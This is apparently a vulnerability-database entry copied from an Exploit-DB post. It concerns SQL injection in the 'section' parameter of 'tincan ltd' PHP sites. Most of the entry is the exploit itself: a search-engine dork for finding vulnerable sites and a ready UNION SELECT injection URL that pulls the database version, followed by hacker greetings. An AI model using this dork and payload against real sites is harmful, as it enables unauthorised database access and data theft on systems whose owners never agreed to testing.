tincan ltd - 'section' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1058972 漏洞类型
发布时间 2010-01-11 更新时间 2010-01-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11113
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
+/=============================================\+
# [+] Title : tincan ltd (section) SQL Injection Vulnerability
# [+] site s.p : www.tincan.co.uk<http://www.tincan.co.uk>
# [+] Author : altbta
# [+] Email : l_9@HoTMaIL.com
# [+] home : v4-team.com<http://v4-team.com> & tryag.cc
+\=============================================/+

===============================================
DorK : intext:'powered by tincan ltd' and  inurl:"section.php?section=9"
===============================================
Exploit :
http://server/section.php?section=9&topic=6+union+select+1,2,3,version(),5--
============================================
GreeTz To :
  RxH   &    ab0-3th4b   &   sniper site